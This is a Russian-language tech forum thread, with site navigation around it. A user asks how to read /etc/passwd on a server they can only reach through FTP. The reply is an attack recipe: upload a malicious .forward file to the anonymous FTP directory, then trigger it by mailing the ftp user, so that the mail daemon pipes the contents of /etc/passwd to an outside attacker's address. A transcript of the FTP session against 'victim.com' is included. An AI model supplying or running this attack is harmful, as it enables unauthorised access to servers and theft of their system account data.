· Генеральная
· Статьи
· Поиск
· Материнские платы
· Чипсеты, контроллеры
· CPU - процессоры
· Память - RAM
· Видеокарты
· HDD, SSD, FDD
· CD - DVD - BD
· Звуковые карты
· Охлаждение ПК
· Корпуса ПК
· Блоки питания, ИБП...
· Мониторы, телевизоры
· Клавиатуры, мыши...
· Ноутбуки, десктопы
· Интернет, модемы, LAN
· Принтеры, сканеры...
· Камеры фото-видео
· Мультимедиа
· Компьютеры - общая
· Программное обеспечение
· Игры ПК
· Справочники, радиодело
· Производители
· ГД - динамики, микрофоны
· Аппаратура
· Телевидение
· Безопасность - security
· Электроника / Быт
· Телефоны / мобильники
· Пульты - ПДУ
· Создание сайтов
· О сайте wasp.kz...
· Добавить новость
· Каталог ссылок
· Пресс-релизы
О нет! Где
JavaScript ?
У Вашего браузера отключен JavaScript или он просто не поддерживает JavaScript. Пожалуйста
включите JavaScript на Вашем веб-браузере для нормального просмотра данного веб-сайта,
или
обновите свой браузер на поддерживаемый JavaScript;
Firefox ,
Safari ,
Opera ,
Chrome или
Internet Explorer не ниже, чем версия 6.
Просмотр темы
Как прочитать /etc/passwd?
Опубликовано 19-06-2024 11:15
Новичок
Сообщений: 4
Вас поблагодарили: 0 раз(а) в 0 сообщениях
Зарегистрирован: 19.06.24
Со дня регистрации: 14
Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?
Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера
Код
bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker© mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/
Is'. (192.168.1.1, 2335) (0 bytes) total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp© victim.com
В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло
*
Изменил(а) wasp , 19-06-2024 12:11
Здесь присутствуют: 1 (пользователей: 0, гостей: 1)
Перейти на форум:
- Правила сайта и форума wasp.kz - Новости. События. Даты. - О сайте и форуме - Коронавирус COVID-19
- Процессоры - CPU - Материнские платы - Mainboard - Видеокарты - Videocards - Оперативная память - RAM - Накопители - HDD, CD/DVD, Flash... - Системы охлаждения - coolers - Блоки питания, UPS, фильтры... - Корпуса - Case - ТВ-тюнеры - TV-Tuner's - Контроллеры, адаптеры, порты, разъемы - Сборка ПК, проблемы, вопросы
- Ноутбуки, нетбуки и подобное - Телефоны, смартфоны, планшеты... - Разное, аксессуары
- ОС Windows - OC Linux и FreeBSD, Android, iOS и прочее - Программы - всякие - Безопасность - Разное прочее
- Связь и интернет-доступ, провайдеры - Модемы, сети, LAN, Wi-Fi и прочее оборудование - Создание сайтов - Интернет - общее -- Сервисы Яндекса и Гугла, ФБ и VK, прочие соцсети -- Бизнес в интернете -- Майнинг и криптовалюты
- Принтеры, МФУ, сканеры, факсы... - Заправка картриджей принтеров, копиров... - Клавиатуры, мыши, манипуляторы - Видео, веб-камеры, фотоаппараты, наблюдение - Мониторы
- Action/RPG - Стрелялки -- Зона S.T.A.L.K.E.R-ов !!! -- Вселенная Fallout -- Crysis и Far Cry -- ZOMBIELAND - игры про зомби - Гонки - Стратегии - Симуляторы - Adventure и Survival Horror - Общее не вошедшее
- Акустические системы - колонки, наушники - Усилители, эквалайзеры, кроссоверы... - Звуковые карты - audiocards, ЦАП - Спутниковое, эфирное и кабельное телевидение - Электроника, радиодело, ремонт
- Отзывы об магазинах, компаниях, продавцах, сервисе - Отзывы на товары и услуги - все - Товары и услуги - не спам!
- Интересное. Полезное. Нужное. -- Альтернативная энергетика -- Работа, предложения, вакансии -- Политический уголок - вся возня! -- Зооуголок - Казахстан - все разговоры - Музыка и Кино, Театр, Искусство - История, география... науки!
- Мусорная корзина
Вы не зарегистрированы?
Нажмите здесь для регистрации.
Забыли пароль?
Запросите новый
здесь .
· Гостей: 16
· Пользователей: 0
· Всего пользователей: 5,385
· Новый пользователь: Amirkz